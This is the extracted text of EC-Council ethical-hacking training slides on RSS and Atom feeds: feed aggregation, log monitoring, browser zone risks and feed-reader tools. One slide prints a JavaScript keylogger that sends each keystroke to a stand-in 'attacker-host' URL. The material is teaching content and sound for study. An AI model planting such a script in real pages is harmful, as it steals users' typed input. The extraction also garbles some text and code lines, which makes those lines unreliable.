SlideShare a Scribd company logo
1 of 33
Download to read offline
Ethical Hacking and
C tCountermeasures
Version 6
Mod le LIIModule LII
Hacking RSS and Atom
Module Objective
Thi d l ill f ili i i h
• RSS and Atom
B ildi F d A t
This module will familiarize you with:
• Building a Feed Aggregator
• Monitoring the Server with Feeds
• Tracking Changes in Open Source Projects
Ri k b Z• Risks by Zone
• Reader Specific Risks
• Example for Attacker to Attack the Feeds
l• Tools
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Module Flow
RSS and Atom Risks by Zone
Building a Feed
Aggregator
Reader Specific Risks
Monitoring the Server
with Feeds
Example for Attacker to
Attack the Feeds
Tracking Changes in
Open Source Projects
Tools
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Open Source Projects
Introduction
RSS (Really Simple Syndication) and Atom is a format for
d li i d t d b t tdelivering updated web content
RSS and Atom feeds makes easy for the user to surf the Web
for any updated information instead of going through eachfor any updated information instead of going through each
Website
RSS and Atom feeds are collectively called as Syndicationy y
feeds
These syndication feeds let the user to collect the newThese syndication feeds let the user to collect the new
information in their inbox, like email
It slices up the Web into timely capsules of microcontent
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
It slices up the Web into timely capsules of microcontent
which allows the user to make modifications
Areas Where RSS and Atom is
UsedUsed
Website owners search for dynamic
• Provide top content to their users
Website owners search for dynamic
content to:
p
• Boost their website traffic and search engine ranking
News sites
BlBloggers
P2P Sites
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Building a Feed Aggregator
Finding Feeds to Aggregate
• Feeds can be found anywhere on the web page and
blogs
• A ubiquitous “XML” button link
O f h li d “RSS ” “ATOM ”
feeds
• One of the more stylized “RSS 2.0” or “ATOM 0.3”
mini-button Links
• Any hyperlink with a direct mention of “RSS” or
“Atom” feeds
h l k h d d h• A hyperlink that reads “Syndicate this Site”
Th th d th h hi h th di t f d
Clickable Feed Buttons
• The methods through which the syndicate feeds
work in a different ways while clicking a feed URL
are:
• Appropriate MIME-types in Web server configuration
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
pp p yp g
• Universal Resource Identifier (URI) scheme in feed
URLs
Monitoring the Server with Feeds
Feeds generated contain very sensitive information about
Monitoring Logs
your server
• A log is a stream of events in chronological order
and feeds tend to be a stream of entries in reverse
h l i l d
g g
chronological order
• So, it is possible to build a scraper that simply
translates log events straight into feed entries
• You can monitor the server logs using the feedsg g
gathered by scraper
Place these feeds built by programs behind password-
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
y p g p
protected directories, and, access them only via HTTPS
Monitoring the Server with Feeds
(cont’d)(cont d)
Building Feeds Incrementally
• Feed generator manages collection of entries to keep the
previous program entries run in the feed
Building Feeds Incrementally
• Apache log mostly consists of real problems that need fixing at
some point based on persistently buggy or chatty software
Monitoring Problems in Apache Logs
some point based on persistently buggy or chatty software
W h h l h h A h l i h
Watch for Incoming Links in Apache Logs
• Watch the access logs when the Apache error logs are in the
aggregator which are more active, jumbled, and noisy than the
error logs
• This also helps in accessing how people are getting into the
site
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
site
Tracking Changes in Open Source
ProjectsProjects
Concurrent Versions System (CVS) and Subversion Repositories are
d t it th l t t dditi d i i t j tused to monitor the latest additions and revisions to project source
code, and to funnel those events into syndication feed entries
Watching Projects in (CVS) Repositories
• The essential functions of CVS are:
• Check-out
• Update
Commit• Commit
• Finding a CVS Repository
• The collection of active Open Source projects is at
SourceForge
• CVS repository is included among the resources offered by
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• CVS repository is included among the resources offered by
SourceForge
Tracking Changes in Open Source
Projects (cont’d)Projects (cont d)
Watching Projects in Subversion
i i
• Subversion repositories is an advanced form of CVS
I i d
Repositories
• It introduces:
• Atomic commits to prevent from partially checked-ins
• Directory versioning to track changes to a project that go
beyond source code changesy g
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Risks by Zone: Remote Zone risk
The risks involved in this zone are for Web browsers and web based
readers
Cross-site request forgery:
readers
• In this, the attacker makes the system to send requests to a
website to execute commands
Potential to launch attacks:
• The attacker can trick the user’s browser into performing
web based attacks on their behalf, it may lead to DoS
attack or can execute commands if the site is vulnerable
• Depending on the developers request to the web library
(POST or GET data) the attacker uses this feature of
Post data and spam:
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
(POST or GET data), the attacker uses this feature of
converting data and spam's the victims of a particular site
Risks by Zone: Local Zone Risk
The local zone risk arises when the feed is converted to HTMLe oca o e s a ses e t e eed s co e ted to
file, stored in a local file, and loaded to Internet explorer instance
This will allow the reader to open the file to the local browser’s
zone and functionality
The functionality has the access to ActiveX objects with
permissions to read and write files to disk
The other risks involved are access to the XMLHttp and
XMLHttpRequest objects typically used by Ajax applications
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
XMLHttpRequest objects typically used by Ajax applications
Reader Specific Risks
Web reader risks:
• Users subscribe to a web-based feed with browsers or
local clients
• These feeds can be affected by both local and remote• These feeds can be affected by both local and remote
zone risks
• Online sites, such as Bloglines or Google, provide web-
based feed viewers and have remote zone risk
• Attackers exploit the vulnerabilities in web based
viewers, steal cookies, and perform cross-site scripting
attacks
• Impact of a feed-based attack increases when the feed
Website risks:
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• Impact of a feed based attack increases when the feed
being controlled is syndicated on other web sites
Utilizing the Web Feeds
VulnerabilitiesVulnerabilities
The vulnerabilities in the web
• The feed owner is malicious
The vulnerabilities in the web
feed client can be utilized if:
• The feed owner is malicious
• The web site which is providing the feed is
hacked
• The feeds created form mailing lists, bulletin
board messages, peer-to-peer (P2P) web sites,
BitTorrent sites or user postings on blogs, can be
injected with malicious payload
• The feed is changed during the transport phase• The feed is changed during the transport phase
via proxy cache poisoning
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Example for Attacker to Attack the
FeedsFeeds
The attacker injects keystroke logging
JavaScript on to the website displaying the
•<script LANGUAGE="JavaScript">
JavaScript on to the website displaying the
feed
•document.captureEvents(Event.KEYPRESS);
•document.onkeypress = captureKeyStrokes;
•function captureKeyStrokes(e) {
•var key = String.fromCharCode(e.which);var key String.fromCharCode(e.which);
•var img = new Image();
•var src = "http://attacker-host/?" +
"keystroke=" + escape(key);
•img src src;•img.src = src;
•return true;}
•</script>
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
It allows an attacker to record everything the user is typing, on
every page
Example for Attacker to Attack the
Feeds (cont’d)Feeds (cont d)
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
T lTools
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Perseptio FeedAgent
Perseptio FeedAgent is an RSS feed reader that can keep upto date
information from the favorite web feedsinformation from the favorite web feeds
It adds feeds manually, imports them from OPML files, or selects
feeds from the built in directoryfeeds from the built-in directory
It includes scoring feature that automatically recommends new news
items based on the ratings of previous itemsitems based on the ratings of previous items
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Perseptio FeedAgent: Screenshot
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
RssFeedEater
RssFeedEater is an RSS Reader that gathers
i f ti f i it th t ffinformation from various sites that offer
syndicated content
The program comes pre-loaded with various
feeds in several categories
New feeds can be easily created for the favorite
sites by simply adding them to a category
It provides a clean easy to use interface
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
It provides a clean, easy to use interface
RssFeedEater: Screenshot
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Thingamablog
Thingamablog is a cross-platform, blogging
application, and RSS feed reader
It allows to easily publish own weblog without
h d f HTML k l dthe need for any HTML knowledge
The interface provides a neatly organized
overview of the blogs and a word processor like
interface to create new entries
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Thingamablog: Screenshot
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
RSS Builder
RSS Builder is an easy to
use program to create or
maintain one or more RSS
feeds for the web site
Interface supports adding
topics, links and content,
and then upload the .rss
fil t th bfile to the web server,
using the built-in FTP
client
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
RSS Submit
RSS Submit enables to submit the RSS Feeds to various RSS search
enginesengines
It also enables to submit multiple feeds at once, and also validate
them via a link to an online service
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
FeedDemon
FeedDemon is a client that can retrieve and organize RSS feeds from
the Internetthe Internet
It has dozens of pre-configured newsfeeds, and it also allows own
feeds by adding the URL for an RSS feed of user’s choicefeeds by adding the URL for an RSS feed of user s choice
It offers an attractive and easy to use interface with integrated web
browsingbrowsing
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
FeedDemon: Screenshot
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
FeedForAll
FeedForAll enables to
easily create, edit, and
publish RSS feeds
It automatically updates
older feeds to conform
with RSS 2 0 standardswith RSS 2.0 standards,
and supports advanced
feed properties
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
FeedExpress
FeedExpress is an easy to useFeedExpress is an easy to use
RSS/RDF client
It caches and indexes all theIt caches and indexes all the
feeds for each RSS
subscription, making it easy to
overview all the feeds
Refresh time can be set for
each feed or all of them
Customizes the CSS style
appearance
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
appearance
RSS and Atom Security
The security in RSS and Atom can be
d i th
• Authentication
• Identify the user requesting for the feed
done in three ways:
• Identify the user requesting for the feed
• This can be done by tried-and-true HTTP authentication
mechanisms, including Basic and Digest
• Authorization
• After authentication is completed it can be decided
whether the user is allowed to access the requested
content
E ti• Encryption
• Encrypt the content to negate the use by third party
sniffers
• This can be done by using SSL which protects the web
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
This can be done by using SSL which protects the web
server
Summary
RSS and Atom feeds are collectively called as Syndication feedsRSS and Atom feeds are collectively called as Syndication feeds
RSS and Atom feeds makes it easy for the user to surf the Web for any
updated information instead of going through each Websitep g g g
Feeds can be found any where on the web page and blogs
Parsers built on the sites which produces feeds are called Scrapers
A log is a stream of events in chronological order
Feed generator manages collection of entries to keep the previous
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Feed generator manages collection of entries to keep the previous
program entries running in the feed
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited

More Related Content

What's hot

Ce hv6 module 53 hacking web browsers
Ce hv6 module 53 hacking web browsersCe hv6 module 53 hacking web browsers
Ce hv6 module 53 hacking web browsersVi Tính Hoàng Nam
 
Ce hv6 module 41 hacking usb devices
Ce hv6 module 41 hacking usb devicesCe hv6 module 41 hacking usb devices
Ce hv6 module 41 hacking usb devicesVi Tính Hoàng Nam
 
Ceh v5 module 17 physical security
Ceh v5 module 17 physical securityCeh v5 module 17 physical security
Ceh v5 module 17 physical securityVi Tính Hoàng Nam
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingVi Tính Hoàng Nam
 
Ce hv6 module 49 creating security policies
Ce hv6 module 49 creating security policiesCe hv6 module 49 creating security policies
Ce hv6 module 49 creating security policiesVi Tính Hoàng Nam
 
Ce Hv6 Module 44 Internet Content Filtering Techniques
Ce Hv6 Module 44 Internet Content Filtering TechniquesCe Hv6 Module 44 Internet Content Filtering Techniques
Ce Hv6 Module 44 Internet Content Filtering TechniquesKislaychd
 
Ceh v5 module 19 evading ids firewall and honeypot
Ceh v5 module 19 evading ids firewall and honeypotCeh v5 module 19 evading ids firewall and honeypot
Ceh v5 module 19 evading ids firewall and honeypotVi Tính Hoàng Nam
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesVi Tính Hoàng Nam
 
Ceh v5 module 16 virus and worms
Ceh v5 module 16 virus and wormsCeh v5 module 16 virus and worms
Ceh v5 module 16 virus and wormsVi Tính Hoàng Nam
 
Ce hv6 module 61 threats and countermeasures
Ce hv6 module 61 threats and countermeasuresCe hv6 module 61 threats and countermeasures
Ce hv6 module 61 threats and countermeasuresVi Tính Hoàng Nam
 
Ce hv6 module 56 hacking global positioning system
Ce hv6 module 56 hacking global positioning systemCe hv6 module 56 hacking global positioning system
Ce hv6 module 56 hacking global positioning systemVi Tính Hoàng Nam
 

What's hot (20)

Ce hv6 module 53 hacking web browsers
Ce hv6 module 53 hacking web browsersCe hv6 module 53 hacking web browsers
Ce hv6 module 53 hacking web browsers
 
Ce hv6 module 41 hacking usb devices
Ce hv6 module 41 hacking usb devicesCe hv6 module 41 hacking usb devices
Ce hv6 module 41 hacking usb devices
 
File000149
File000149File000149
File000149
 
Ceh v5 module 17 physical security
Ceh v5 module 17 physical securityCeh v5 module 17 physical security
Ceh v5 module 17 physical security
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hacking
 
Ce hv6 module 49 creating security policies
Ce hv6 module 49 creating security policiesCe hv6 module 49 creating security policies
Ce hv6 module 49 creating security policies
 
File000143
File000143File000143
File000143
 
Ce Hv6 Module 44 Internet Content Filtering Techniques
Ce Hv6 Module 44 Internet Content Filtering TechniquesCe Hv6 Module 44 Internet Content Filtering Techniques
Ce Hv6 Module 44 Internet Content Filtering Techniques
 
Ce hv6 module 62 case studies
Ce hv6 module 62 case studiesCe hv6 module 62 case studies
Ce hv6 module 62 case studies
 
Ceh v5 module 19 evading ids firewall and honeypot
Ceh v5 module 19 evading ids firewall and honeypotCeh v5 module 19 evading ids firewall and honeypot
Ceh v5 module 19 evading ids firewall and honeypot
 
File000144
File000144File000144
File000144
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
 
File000138
File000138File000138
File000138
 
Ceh v5 module 16 virus and worms
Ceh v5 module 16 virus and wormsCeh v5 module 16 virus and worms
Ceh v5 module 16 virus and worms
 
Ce hv6 module 61 threats and countermeasures
Ce hv6 module 61 threats and countermeasuresCe hv6 module 61 threats and countermeasures
Ce hv6 module 61 threats and countermeasures
 
File000142
File000142File000142
File000142
 
File000141
File000141File000141
File000141
 
File000175
File000175File000175
File000175
 
Ce hv6 module 56 hacking global positioning system
Ce hv6 module 56 hacking global positioning systemCe hv6 module 56 hacking global positioning system
Ce hv6 module 56 hacking global positioning system
 
File000119
File000119File000119
File000119
 

Viewers also liked

Ce hv6 module 43 cyber warfare hacking al-qaida and terrorism
Ce hv6 module 43 cyber warfare  hacking al-qaida and terrorismCe hv6 module 43 cyber warfare  hacking al-qaida and terrorism
Ce hv6 module 43 cyber warfare hacking al-qaida and terrorismVi Tính Hoàng Nam
 
Ce hv6 module 51 hacking and cheating online games
Ce hv6 module 51 hacking and cheating online gamesCe hv6 module 51 hacking and cheating online games
Ce hv6 module 51 hacking and cheating online gamesVi Tính Hoàng Nam
 
Ce hv6 module 47 spying technologies
Ce hv6 module 47 spying technologiesCe hv6 module 47 spying technologies
Ce hv6 module 47 spying technologiesVi Tính Hoàng Nam
 
Ce hv6 module 64 economic espionage
Ce hv6 module 64 economic espionageCe hv6 module 64 economic espionage
Ce hv6 module 64 economic espionageVi Tính Hoàng Nam
 
Ce hv6 module 60 firewall technologies
Ce hv6 module 60 firewall technologiesCe hv6 module 60 firewall technologies
Ce hv6 module 60 firewall technologiesVi Tính Hoàng Nam
 
Ce hv6 module 44 internet content filtering techniques
Ce hv6 module 44 internet content filtering techniquesCe hv6 module 44 internet content filtering techniques
Ce hv6 module 44 internet content filtering techniquesVi Tính Hoàng Nam
 
Ce hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database serversCe hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database serversVi Tính Hoàng Nam
 
Ce hv6 module 58 credit card frauds
Ce hv6 module 58 credit card fraudsCe hv6 module 58 credit card frauds
Ce hv6 module 58 credit card fraudsVi Tính Hoàng Nam
 
Ce hv6 module 59 how to steal passwords
Ce hv6 module 59 how to steal passwordsCe hv6 module 59 how to steal passwords
Ce hv6 module 59 how to steal passwordsVi Tính Hoàng Nam
 
Ce hv6 module 65 patch management
Ce hv6 module 65 patch managementCe hv6 module 65 patch management
Ce hv6 module 65 patch managementVi Tính Hoàng Nam
 
Ceh v5 module 22 penetration testing
Ceh v5 module 22 penetration testingCeh v5 module 22 penetration testing
Ceh v5 module 22 penetration testingVi Tính Hoàng Nam
 
Ce hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologiesCe hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologiesVi Tính Hoàng Nam
 
CATALOGUE QUESTEK (Tiếng Việt)
CATALOGUE QUESTEK (Tiếng Việt)CATALOGUE QUESTEK (Tiếng Việt)
CATALOGUE QUESTEK (Tiếng Việt)Vi Tính Hoàng Nam
 

Viewers also liked (17)

Ce hv6 module 43 cyber warfare hacking al-qaida and terrorism
Ce hv6 module 43 cyber warfare  hacking al-qaida and terrorismCe hv6 module 43 cyber warfare  hacking al-qaida and terrorism
Ce hv6 module 43 cyber warfare hacking al-qaida and terrorism
 
Ceh v5 module 18 linux hacking
Ceh v5 module 18 linux hackingCeh v5 module 18 linux hacking
Ceh v5 module 18 linux hacking
 
Qtx 6404
Qtx 6404Qtx 6404
Qtx 6404
 
Ceh v5 module 21 cryptography
Ceh v5 module 21 cryptographyCeh v5 module 21 cryptography
Ceh v5 module 21 cryptography
 
Ce hv6 module 51 hacking and cheating online games
Ce hv6 module 51 hacking and cheating online gamesCe hv6 module 51 hacking and cheating online games
Ce hv6 module 51 hacking and cheating online games
 
Ce hv6 module 47 spying technologies
Ce hv6 module 47 spying technologiesCe hv6 module 47 spying technologies
Ce hv6 module 47 spying technologies
 
Ce hv6 module 64 economic espionage
Ce hv6 module 64 economic espionageCe hv6 module 64 economic espionage
Ce hv6 module 64 economic espionage
 
Ce hv6 module 60 firewall technologies
Ce hv6 module 60 firewall technologiesCe hv6 module 60 firewall technologies
Ce hv6 module 60 firewall technologies
 
Ce hv6 module 44 internet content filtering techniques
Ce hv6 module 44 internet content filtering techniquesCe hv6 module 44 internet content filtering techniques
Ce hv6 module 44 internet content filtering techniques
 
Ce hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database serversCe hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database servers
 
Ce hv6 module 58 credit card frauds
Ce hv6 module 58 credit card fraudsCe hv6 module 58 credit card frauds
Ce hv6 module 58 credit card frauds
 
Ce hv6 module 63 botnets
Ce hv6 module 63 botnetsCe hv6 module 63 botnets
Ce hv6 module 63 botnets
 
Ce hv6 module 59 how to steal passwords
Ce hv6 module 59 how to steal passwordsCe hv6 module 59 how to steal passwords
Ce hv6 module 59 how to steal passwords
 
Ce hv6 module 65 patch management
Ce hv6 module 65 patch managementCe hv6 module 65 patch management
Ce hv6 module 65 patch management
 
Ceh v5 module 22 penetration testing
Ceh v5 module 22 penetration testingCeh v5 module 22 penetration testing
Ceh v5 module 22 penetration testing
 
Ce hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologiesCe hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologies
 
CATALOGUE QUESTEK (Tiếng Việt)
CATALOGUE QUESTEK (Tiếng Việt)CATALOGUE QUESTEK (Tiếng Việt)
CATALOGUE QUESTEK (Tiếng Việt)
 

Similar to Ethical Hacking RSS and Atom Feeds

Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)Wail Hassan
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresRoel Palmaers
 
Developing rich multimedia applications with FI-WARE.
Developing rich multimedia applications with FI-WARE.Developing rich multimedia applications with FI-WARE.
Developing rich multimedia applications with FI-WARE.Luis Lopez
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
05.m3 cms list-ofwebserver
05.m3 cms list-ofwebserver05.m3 cms list-ofwebserver
05.m3 cms list-ofwebservertarensi
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacksFrank Victory
 
Arcomem training Specifying Crawls Beginners
Arcomem training Specifying Crawls BeginnersArcomem training Specifying Crawls Beginners
Arcomem training Specifying Crawls Beginnersarcomem
 
Code for Startup MVP (Ruby on Rails) Session 1
Code for Startup MVP (Ruby on Rails) Session 1Code for Startup MVP (Ruby on Rails) Session 1
Code for Startup MVP (Ruby on Rails) Session 1Henry S
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Dependencies and Licenses
Dependencies and LicensesDependencies and Licenses
Dependencies and LicensesRobert Reiz
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best PracticesRobert Vidal
 
Asynchronous Frameworks.pptx
Asynchronous Frameworks.pptxAsynchronous Frameworks.pptx
Asynchronous Frameworks.pptxganeshkarthy
 
SophiaConf2010 Présentation des Retours d'expériences de la Conférence du 08 ...
SophiaConf2010 Présentation des Retours d'expériences de la Conférence du 08 ...SophiaConf2010 Présentation des Retours d'expériences de la Conférence du 08 ...
SophiaConf2010 Présentation des Retours d'expériences de la Conférence du 08 ...TelecomValley
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
web-servers3952 (1)qwjelkjqwlkjkqlwe.ppt
web-servers3952 (1)qwjelkjqwlkjkqlwe.pptweb-servers3952 (1)qwjelkjqwlkjkqlwe.ppt
web-servers3952 (1)qwjelkjqwlkjkqlwe.ppt20521742
 
Developing rich multimedia applications with Kurento: a tutorial for JavaScri...
Developing rich multimedia applications with Kurento: a tutorial for JavaScri...Developing rich multimedia applications with Kurento: a tutorial for JavaScri...
Developing rich multimedia applications with Kurento: a tutorial for JavaScri...Luis Lopez
 
Web application development ( basics )
Web application development ( basics )Web application development ( basics )
Web application development ( basics )Chirag Nag
 

Similar to Ethical Hacking RSS and Atom Feeds (20)

Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
 
Developing rich multimedia applications with FI-WARE.
Developing rich multimedia applications with FI-WARE.Developing rich multimedia applications with FI-WARE.
Developing rich multimedia applications with FI-WARE.
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
unit1 part 1 sem4 php.docx
unit1 part 1 sem4 php.docxunit1 part 1 sem4 php.docx
unit1 part 1 sem4 php.docx
 
05.m3 cms list-ofwebserver
05.m3 cms list-ofwebserver05.m3 cms list-ofwebserver
05.m3 cms list-ofwebserver
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 
Arcomem training Specifying Crawls Beginners
Arcomem training Specifying Crawls BeginnersArcomem training Specifying Crawls Beginners
Arcomem training Specifying Crawls Beginners
 
Code for Startup MVP (Ruby on Rails) Session 1
Code for Startup MVP (Ruby on Rails) Session 1Code for Startup MVP (Ruby on Rails) Session 1
Code for Startup MVP (Ruby on Rails) Session 1
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
Dependencies and Licenses
Dependencies and LicensesDependencies and Licenses
Dependencies and Licenses
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
 
Asynchronous Frameworks.pptx
Asynchronous Frameworks.pptxAsynchronous Frameworks.pptx
Asynchronous Frameworks.pptx
 
SophiaConf2010 Présentation des Retours d'expériences de la Conférence du 08 ...
SophiaConf2010 Présentation des Retours d'expériences de la Conférence du 08 ...SophiaConf2010 Présentation des Retours d'expériences de la Conférence du 08 ...
SophiaConf2010 Présentation des Retours d'expériences de la Conférence du 08 ...
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysis
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
web-servers3952 (1)qwjelkjqwlkjkqlwe.ppt
web-servers3952 (1)qwjelkjqwlkjkqlwe.pptweb-servers3952 (1)qwjelkjqwlkjkqlwe.ppt
web-servers3952 (1)qwjelkjqwlkjkqlwe.ppt
 
Developing rich multimedia applications with Kurento: a tutorial for JavaScri...
Developing rich multimedia applications with Kurento: a tutorial for JavaScri...Developing rich multimedia applications with Kurento: a tutorial for JavaScri...
Developing rich multimedia applications with Kurento: a tutorial for JavaScri...
 
Web application development ( basics )
Web application development ( basics )Web application development ( basics )
Web application development ( basics )
 

More from Vi Tính Hoàng Nam

CATALOG KBVISION (Tiếng Việt)
CATALOG KBVISION (Tiếng Việt)CATALOG KBVISION (Tiếng Việt)
CATALOG KBVISION (Tiếng Việt)Vi Tính Hoàng Nam
 
Tl wr740 n-v4_user_guide_1910010682_vn
Tl wr740 n-v4_user_guide_1910010682_vnTl wr740 n-v4_user_guide_1910010682_vn
Tl wr740 n-v4_user_guide_1910010682_vnVi Tính Hoàng Nam
 
HƯỚNG DẪN SỬ DỤNG ĐẦU GHI QTD-6108
HƯỚNG DẪN SỬ DỤNG ĐẦU GHI QTD-6108HƯỚNG DẪN SỬ DỤNG ĐẦU GHI QTD-6108
HƯỚNG DẪN SỬ DỤNG ĐẦU GHI QTD-6108Vi Tính Hoàng Nam
 
Brochua đầu ghi hình QTD-6100 Series
Brochua đầu ghi hình QTD-6100 SeriesBrochua đầu ghi hình QTD-6100 Series
Brochua đầu ghi hình QTD-6100 SeriesVi Tính Hoàng Nam
 
NSRT: Dụng cụ tháo đầu báo
NSRT: Dụng cụ tháo đầu báoNSRT: Dụng cụ tháo đầu báo
NSRT: Dụng cụ tháo đầu báoVi Tính Hoàng Nam
 
SLV-24N: Đầu báo khói quang
SLV-24N: Đầu báo khói quangSLV-24N: Đầu báo khói quang
SLV-24N: Đầu báo khói quangVi Tính Hoàng Nam
 
SLV-24N: Đầu báo khói quang
SLV-24N: Đầu báo khói quangSLV-24N: Đầu báo khói quang
SLV-24N: Đầu báo khói quangVi Tính Hoàng Nam
 
PEX-xx: Bộ hiển thị phụ 5-210 zone cho tủ RPP, RPS, RPQ
PEX-xx: Bộ hiển thị phụ 5-210 zone cho tủ RPP, RPS, RPQPEX-xx: Bộ hiển thị phụ 5-210 zone cho tủ RPP, RPS, RPQ
PEX-xx: Bộ hiển thị phụ 5-210 zone cho tủ RPP, RPS, RPQVi Tính Hoàng Nam
 
HRA-1000: Hiển thị phụ cho TT HCP-1008E
HRA-1000: Hiển thị phụ cho TT HCP-1008EHRA-1000: Hiển thị phụ cho TT HCP-1008E
HRA-1000: Hiển thị phụ cho TT HCP-1008EVi Tính Hoàng Nam
 
RPP-ABW: TT báo cháy 10-20 kênh
RPP-ABW: TT báo cháy 10-20 kênhRPP-ABW: TT báo cháy 10-20 kênh
RPP-ABW: TT báo cháy 10-20 kênhVi Tính Hoàng Nam
 
RPP-ECW: TT báo cháy 3-5 kênh
RPP-ECW: TT báo cháy 3-5 kênhRPP-ECW: TT báo cháy 3-5 kênh
RPP-ECW: TT báo cháy 3-5 kênhVi Tính Hoàng Nam
 
HCP-1008E: TT báo cháy 8-24 kênh
HCP-1008E: TT báo cháy 8-24 kênhHCP-1008E: TT báo cháy 8-24 kênh
HCP-1008E: TT báo cháy 8-24 kênhVi Tính Hoàng Nam
 
HCV-2/4/8: TT báo cháy 2,4,8 kênh
HCV-2/4/8: TT báo cháy 2,4,8 kênhHCV-2/4/8: TT báo cháy 2,4,8 kênh
